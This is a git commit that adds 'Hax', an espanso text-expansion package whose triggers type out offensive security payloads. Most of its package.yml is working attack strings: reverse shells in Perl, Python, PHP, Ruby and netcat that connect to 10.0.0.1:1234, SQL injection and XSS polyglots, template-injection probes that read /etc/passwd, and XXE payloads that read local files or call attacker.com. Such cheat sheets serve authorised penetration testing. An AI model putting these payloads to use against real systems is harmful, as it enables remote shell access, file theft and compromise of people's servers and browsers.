Initial Commit, move from a symlink farm to yadm
This commit is contained in:
5
.config/espanso/match/packages/hax/README.md
Normal file
5
.config/espanso/match/packages/hax/README.md
Normal file
@@ -0,0 +1,5 @@
|
||||
# Hax - A collection of shortcuts for hackers/penetration testers
|
||||
|
||||
All the payloads included in `Hax` originate from the following sources, which I would like to thank:
|
||||
- https://github.com/swisskyrepo/PayloadsAllTheThings
|
||||
- https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
|
||||
6
.config/espanso/match/packages/hax/_manifest.yml
Normal file
6
.config/espanso/match/packages/hax/_manifest.yml
Normal file
@@ -0,0 +1,6 @@
|
||||
name: "hax"
|
||||
title: "Hax"
|
||||
description: Penetration testing utilities and replacements
|
||||
version: 0.1.0
|
||||
author: Nick Aliferopoulos
|
||||
tags: ["hax", "hack", "hacking", "penetration", "sqli", "xss", "shell", "ssti", "xxe"]
|
||||
2
.config/espanso/match/packages/hax/_pkgsource.yml
Normal file
2
.config/espanso/match/packages/hax/_pkgsource.yml
Normal file
@@ -0,0 +1,2 @@
|
||||
---
|
||||
hub
|
||||
58
.config/espanso/match/packages/hax/package.yml
Normal file
58
.config/espanso/match/packages/hax/package.yml
Normal file
@@ -0,0 +1,58 @@
|
||||
matches:
|
||||
# Reverse Shells
|
||||
- trigger: ":rev-perl"
|
||||
replace: "perl -e 'use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
|
||||
- trigger: ":rev-python"
|
||||
replace: "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
|
||||
- trigger: ":rev-php"
|
||||
replace: "php -r '$sock=fsockopen(\"10.0.0.1\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
|
||||
- trigger: ":rev-ruby"
|
||||
replace: "ruby -rsocket -e'f=TCPSocket.open(\"10.0.0.1\",1234).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'"
|
||||
- trigger: ":rev-nc"
|
||||
replace: "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f"
|
||||
|
||||
# SQL Injection Payloads
|
||||
- trigger: ":sqli-poly"
|
||||
replace: "SLEEP(1) /*' or SLEEP(1) or '\" or SLEEP(1) or \"*/"
|
||||
|
||||
# Server-side Template Injection Payloads
|
||||
- trigger: ":ssti-asp"
|
||||
replace: "@(1+2)"
|
||||
- trigger: ":ssti-el"
|
||||
replace: "${1+1}"
|
||||
- trigger: ":ssti-el-alt"
|
||||
replace: "#{1+1}"
|
||||
- trigger: ":ssti-groovy"
|
||||
replace: "${\"http://www.google.com\".toURL().text}"
|
||||
- trigger: ":ssti-groovy-alt"
|
||||
replace: "${new URL(\"http://www.google.com\").getText()}"
|
||||
- trigger: ":ssti-jinja"
|
||||
replace: "{{4*4}}[[5*5]]"
|
||||
- trigger: ":ssti-ruby-file"
|
||||
replace: "<%= File.open('/etc/passwd').read %>"
|
||||
- trigger: ":ssti-ruby-dir"
|
||||
replace: "<%= Dir.entries('/') %>"
|
||||
- trigger: ":ssti-smarty"
|
||||
replace: "{$smarty.version}"
|
||||
- trigger: ":ssti-twig"
|
||||
replace: "{{dump(app)}}"
|
||||
- trigger: ":ssti-velocity"
|
||||
replace: "#set($str=$class.inspect(\"java.lang.String\").type)"
|
||||
|
||||
# Cross-site Scripting Payloads
|
||||
- trigger: ":xss-basic"
|
||||
replace: "<script>confirm`1`</script>"
|
||||
- trigger: ":xss-img"
|
||||
replace: "<img src=a onerror=confirm`1`/>"
|
||||
- trigger: ":xss-dom"
|
||||
replace: "#\"><img src=/ onerror=alert(1)>"
|
||||
- trigger: ":xss-markdown"
|
||||
replace: "[a](javascript:prompt(1))"
|
||||
- trigger: ":xss-poly"
|
||||
replace: "\" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//"
|
||||
|
||||
# External XML Entity Injection Payloads
|
||||
- trigger: ":xxe-file"
|
||||
replace: "<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>"
|
||||
- trigger: ":xxe-http"
|
||||
replace: "<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM 'http://attacker.com'>]><root>&test;</root>"
|
||||
Reference in New Issue
Block a user